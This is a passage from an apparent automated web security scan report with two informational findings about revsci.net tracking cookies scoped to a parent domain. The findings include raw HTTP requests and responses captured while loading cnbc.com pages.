rsi_us_1000000="pUMdJEmjPwoc1Q2EMdyUvfqT4VbLvCSNGYnyGCY5AHwt4AP7lLqIcUMIPAD+cmRPS+FkUZOQ6eXNM9IGmpUCTJk+ELcfJjSBcaaspcGcVQT/X+UK+oFrVNTgg9uiLzSj2UEDpJNZiQJrolv7SCuhTg1mPYKssB2zhMA8HmuJU4XGqteV5v/f2wHu6e/iRkkRuWFaaJNJWWiPUYcp/G0bCNEftwqCU1e07T+8bdI7px/SldoFmLuztktuvdKckkl+sDGwgBmI32TtolXye64xuqLfIIvIJj84Nx/zOC16d96t6iqRANKYn2GzH7VTWwmg+EYw5YXWVW605S+OXG3QFF78imd4N9MoUoKYCA3iz6FtEybmZIQMRbyUt8OkWHOiVWiG9gsRxaCpz09sPj5A2dmPoMRy/5qXlMshRaq7xEjSPhcG7VSjr91eg2LQB8dpg9nY2G995xSTTDXCuvfDbjUbf7dV/g3zRojq1922N3Ket0OVx0RAA3jidC62UgeVYcbEgDUjDZHoW8ICnK8id94k2awVq9XK0BK6EsdS4Yl5o+UbWdeMbdJoa6mC1BzgIZyRK6/c6EchoPvWBr3ITmqnGHo7VjNqo4y2Nwrf31M6hP4Gk/p0ESapyLgqHtiqHHYcYbXJmQCEMwe6xirkd7ankKhUGwsXdApl48SWiYskcuhAVkCguI7FNlSdCT8BiFjCSXcL/q4Bf7aZycEyT+S9ltt6rgUN8qvEV42F1B+sH3YjBC4n9GWfUdb3PAS/5mHOsdjoH0bEW7BYDff8c/YTVzZSJN3mpXfuP/BrrW8lQv7zTv7/kf3UYs5rX/7G/1okFeNi2kfFCADWViRoGBntUvFNnA/c1MQMECxzGMlsXOWwYDd//W7dfM2Qmat404UgaYdB/Gu6TT8IGqrnj9SUjNLd1zdUaywXVn1VdA3WLLKV3SN+RVXt34nvy/NGWLdwr3DcCeegHXgAPKioT1CdJQ=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNJ0mFqAIQl6mdYdLQRDvQYIIfkSSOTViaZYlpwhEt6/78z0FbFgF267p/sMT/w0fqNmBL15gMQkV6teZFGMKJ0J/jnIhKaoSScicbImwMNzXmtCG7Gcvwy2l/XGe0r1BCBugCYTv6xau5qK8DrEB/pspFxMdNmeRi8E02GPKdEu6/rDLGppJHaCCytRrreBC5YV7+xd5+TyoznWmW+DMcIkB+TsGA2HdGtXu4ad1zXIEZD2/w/dFsb+y7xZOz46+WpTV9f7WHLXQU2+0qz+yrm/0ipbWyXB8ug6hzummJ6g==; Domain=.revsci.net; Expires=Sat, 16-Jun-2012 10:13:20 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Fri, 17 Jun 2011 10:13:19 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.184. http://pix04.revsci.net/I10985/b3/0/3/1008211/727551731.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/727551731.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rvh2rOfqAC2mBgKcDz10E2TZRRbEIyCo+UWdZpsGrYYdh3uURCSuJBT8fCZxS4dwa2TMPNHPf1Qqv8gUmPOMf6rrcddIMSklF2FdAUMTmYrtIJZ6bP4P6/Al+5VXlxUvEZzx6zjOYyj3SqVg6DjhbsoxFK9mZy09tkwFf3GUVIRr0VuIweTqtBUklZUiNu7YLMomZnVB+zCfsD5RLdiREGAyqK/XVeLTQdGLEsVKMq3qhtzkbVyc0BId9I6QTFCHzlbTXcqIfT/3Lhw6qW1HgUHFOTSkE00T9HWZ59Peawf2OKKTThxwxTRF3p3tmFunuwCSh1MilaruWDv/LMBL/nN6GCs+XDNHWVXUQEKA71DqK0K1J2FsD6ALEYUKyqAeWepreBjDQl+KtAtY7Xdie7YW1rFUFjm2t0nNgDpeUvMfjQbr3vWJV8hOjF5G0c2k9XafiUjbZ/WbcKlCgNqD/8WCkj3c3Wuey2obk8scgBwtTVfUvxerT0Q4TaM73mqCpBDmxZhu+yUoLnATqy/tiKcn75egfCW6/ffzu+7F3a9mtuDWsXOHscmzGfpK4lb7P7+dXQEywZUt0+GZ1bGuqO99Xb63z40wx5mtzZEv6/mOSOFho3792NDh4PndFghoGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:08:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/727551731.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_bpJH="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpihGJjXf6iKbjeLhnxvCqNxuQAmHiwdDZ+f+xJ0E7g8jzcWlRiBwIrTJQ1VzzEycP7TsZSrmbAXquq2sSwsQJOUcj2UGm8VSkIxV9xfIE781mc/TCJUdbSx5HV59K90psAza3lQsbeucQr+xKngFIgfXiymMNcY0q/6RCcExZM8H4CemN9xknRrnc5vICNIeLSboY7cq0pXWkaNIoc8CtJBbUkBxW/s37ijefUpDZUybJVGt69TCapV9P9YVrAcXSyHGhDSJ+dGGByazKszl4o5YCHXH04V7XBfomP9R5Jv1jc4mFOyqVXiesCtjPIKnNdkUzR4iALYtREtq6IzzgHAeZfiR0Sd+Qu5uE5tZo9DKQbobAsfA4kbZG9v+8yN9GwsIA4xvUprRe1I5IgJmsRxhRrGlxE8jRTOuU1Ck/vLFu4ySxKv8JqtUVfqc6w0K1rG7HAEgEHkquAvQv6JTfrxwq+u/EhdNTJ/2wLfw90m67mfW/8wkl1Sr90JpQgbE/IqCbyYvNOD6DP4wUAeJqqNoMv8BWNbtPMSHcSHDp/BtdBW5qd5Nk+AcwNWJuT6NloKIiQCL8LB4jPFn/LLhQ5rW98DzlhXy2Aho6rYMJhvy9iHRHB5li7/SGVYftT7HWIuynDINPRNwu5KR+5owHTJlQJjkdSDQbdyjXdqN4nMRPRpfDWWMRsWL27iC7AIocgBxI4HMg004Bhh533fhoO1fbwm02YntNyt0tJh1RPlIAJQ5SA3Os+e1IWSM0Qz7fcao/5YUpMsF+AgIIwd4rhjTSXfht3lh5IpZneDUPmNUJlRz119ioNxLVNN5D2uMpFPqqXHn6uzAgKiH51qo9COwlD+12OQQpoG0HX7udhzGbtiz3BN05l2jmTlWcwOsQLbQ9T7AY1dP2ogyR8wN4TDrVCom3V7U+8tY60SVP5fyP/MSJsYW/SFDzxjTPw2T1xLrQUCdaD5qXaN4jUWfYrHAtIItI5+XEK/Spf3sZoJyCFFfawdJk3OcbrWy38Vl2kK3T9RnQAOPHtujBtZlECpIwPkInWbX23ujF9357phiiajYBrbun0dzjwI+dPIaE12xV2JwN0VjfL5f3/yOosBB3QMuZRKHCWcFuMIMmmVE/iudJUTwaY2MimupABKgJEGT+uDq/WPU3dy7QCr/MmedbUut7XRz4jRQx/oRKsNgzBeVM0lF7vZcCsSFWpO5IWWsHWn5MQ+/PCftKo5QdE9/i9rW51wGEJyA7EHMC20nBW2EuLkF/2MO0/Qb37AgH5OzNFx/EOCweAh9VF2EpXh7LL3qdPfNffFA=="; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+agzaymK59vZiJkFr2VpXgkC+Jr7XRa3zgxZCz2jywJqL21DklO4Fpq7W4mts2r1Oy1FhyPzXR27q7/qyyBnmVEkLYK9dqm/WXHtOQfXO7stZRMQ4v1NQ+BhisfeIu7o57J/NL+ML4rFz0zPssRqmG3vLe9X4zcDFpnjiWFRNyv+G3MwuzU62+ajHzmOBzh7PtBgmFS5SIFhKeIIKbCMUz4wlPMNSymbJ6a2XKOG+2ei45Ad4YYboEI7WG8ZOPzoCXWZ1lO+ZHBl6X/2ToI5AxhXqR2mV+XImHoSMTtfLK1kM7jouazlFjZ0Ev5vsukEMicI+4X6y4m/3cMVgIcMjpSLVhVO2pEkNKGtwh466rXgs95P0T0WN6/s1KgvwFnqXctRIQ/Or/BUQYRY+DXEIkV7aaPiOviEbg2eRMO4tQnV2eSDALdwYaOt6lWCEWaULYY9HzNvJ20ilDlN5jFDFNKxVLF4u/B5BkRHil8ZfBLkAKoN//aUTRoxpf2yXvLVrJ7F/+imFqugGVtxr32rZ0hQUUmtRmsY2QWKwUq5nVrl20uJO3GCfKzQ18l3zZ5L2NXSJbxITog7107PbyssVEEdHG0hcMYoDyjC4PjbzKjLcW18mXL08XwiHE4YfrQw8lxc5wChjMWjvGvumGXTSl9P6CzP7pe3R+M8FeiZUVxQR9dAK9utm238M7BEjTv0WLCWAGVmZL0i4riBxZOk56P0KfzJC8p0SL7wXK0hPFFCpMkW9jN5fsGG/5Ol4PmRHB9T+Cr44mvQOMzjCEGjNtdNRSawuoNk/ICygEO3/ww5hKsu1TeIWENf75CeAslAJsPHhym99XmQgpuj/3M3sgmZB7BsEl4Ieenb58+YNXKanzGzcfNQweb6ZNtZ7Yhj3b14x7MxWJXAcwdzhiNk+vgIe9rvGjFiOhohn4BPxoz8BGOa7Br+rx+U5dq94tU0sEfN2UWtc4MDjSWKcpARVKBuL6rtiNxbghQp9N1x2lk1209cPfPKLOfg0tZADHGz2YJx/5CzLDj2OHUNBr0AkQkKt02L9C3aKqd9G4C81DCeHwazXesXLG5hlUOr5qacPemO+yXZxmKhacQr/FhJAk9h/LuE/v8oHdPDGRw9EL0klja3m/5k93bXJ+I+ldopJwPL/ozHpClrKOP1jn0j6xCOveVxoEtQ9SPUJ/bC3xwEljBRXDOzZjQssBcrgZGrae8EFSLT6ly4v4dp0DBh8UiRHbVjbC2SOSWE8ARL1zu/pliJmGVFN661g8J+ggiAn+K8V1mVKNJ3FhirFdqcr1dzMCIghzU3lz7gEi3DZ4+qYEeAmaTHVAbQN06H7O/YY6azhqX3h9Kdie4fvz1XdpOHx+YaehMbksNjjc1eC74wuC1pRlGSAiE9A/B5F5tK+StSu9EqgSOEfg7wnHsS5lN7ANxVfkD54qye6zUVRR4m7N+geNSaYBcRwcQjWRNFuXj5b7vE1T22YU//VcIqOa66BHKpTS/VWw642B5fp8A/PNszRPZOWVgACZu7mJlxab8X4BzlxP6NK35oA8FKhqt8k/d4hqeTtUo1lmLzm4vntzE1N8mNzD7FuICvy5VJclYbydw1TC9cD1tcH70JZPCxubJDJt+BiSkqoEhJfPrW0sbS9ImnLKXlW7Rf6AF4l05YBcSS88ZdgC8D6DXjVl73lOD7oOLmdpbV8hYDrdrM0zWvbG+6Esd/bXEZVN3QqDbihQq3NMq12tk+nHOm4Z4O6wqYFGZ/PHWfMapZf5eiJ4oE="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSzELIL4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyf2B4CvyZgtVnlBkJPSMYttQmQdsFotc6nNRbGG5FT0I5yG47/fVdikDsivBgkxj1rkHiAYjWQ0u08UvP/DGv4zewZQXdelC211KXX9Hh+w0rnxONL0c4nxiV6/ef0ICmGx5g6xCy4rEgzOzlXW9zmJmkRYmOiZ9ZxZ9iF0PtCXABedjsGJ4mX22GAkV80WjZaCJ0KbvjhqmXHCcYTyORK85PCO/8Q0yVEky/szYxqO6MKbOuL16BCBgtyjicemMZHYfk+Oh6WGXQ08jNuP3Pj2spgq9aH/tbwzYpUnRVVxVkpg7T7TE5MRsVmyXifKYQLwyR9AHNI6zkUzCGSWw992aSxUyqxCtbO6y0ljBC5uX+7DIC7fGQLw1kb7p1AdG2UMnt/1wAzpDXjakEmmRg/5Yg18iOy4=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rvh2rOfqAC2mBgKcDz10E2TZRRbEIyCo+UWdZpsGrYYdh3uURCSuJBT8fCZxS4dwa2TMPNHPf1Qqv8gUmPOMf6rrcddIMSklF2FdAUMTmYrtIJZ6bP4P6/Al+5VXlxUvEZzx6zjOYyj3SqVg6DjhbsoxFK9mZy09tkwFf3GUVIRr0VuIweTqtBUklZUiNu7YLMomZnVB+zCfsD5RLdiREGAyqK/XVeLTQdGLEsVKMq3qhtzkbVyc0BId9I6QTFCHzlbTXcqIfT/3Lhw6qW1HgUHFOTSkE00T9HWZ59Peawf2OKKTThxwxTRF3p3tmFunuwCSh1MilaruWDv/LMBL/nN6GCs+XDNHWVXUQEKA71DqK0K1J2FsD6ALEYUKyqAeWepreBjDQl+KtAtY7Xdie7YW1rFUFjm2t0nNgDpeUvMfjQbr3vWJV8hOjF5G0c2k9XafiUjbZ/WbcKlCgNqD/8WCkj3c3Wuey2obk8scgBwtTVfUvxerT0Q4TaM73mqCpBDmxZhu+yUoLnATqy/tiKcn75egfCW6/ffzu+7F3a9mtuDWsXOHscmzGfpK4lb7P7+dXQEywZUt0+GZ1bGuqO99Xb63z40wx5mtzZEv6/mOSOFho3792NDh4PndFghoGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:08:53 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:08:52 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.185. http://pix04.revsci.net/I10985/b3/0/3/1008211/743305953.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/743305953.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtMbc8XnixKis2l+N3se7jHFkeQJh7tu1xdJ4Kjb8bCs31iSkOEOguNJRWKb9cIpJN1INL7RIiU3lSBLt1wGx1JyV7z9JBhn/5/LhztSBArx9QwfGZXN0Lbk6M79eT/3+cOXz8vI9WmFIBkVY8jHk+hy/QhzLLFqhPfF3QeYfcnkfI6kItnYJN04FPGH8JvyZk5CgNRKHSQw0cLNwnCnp3H2FVPBeApsnc+bPQELVw7zHIz+Awb0w5kLYRZFv5z25yO3tlbXMIhYgOcVdvYvqNNw=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:18:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/743305953.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; 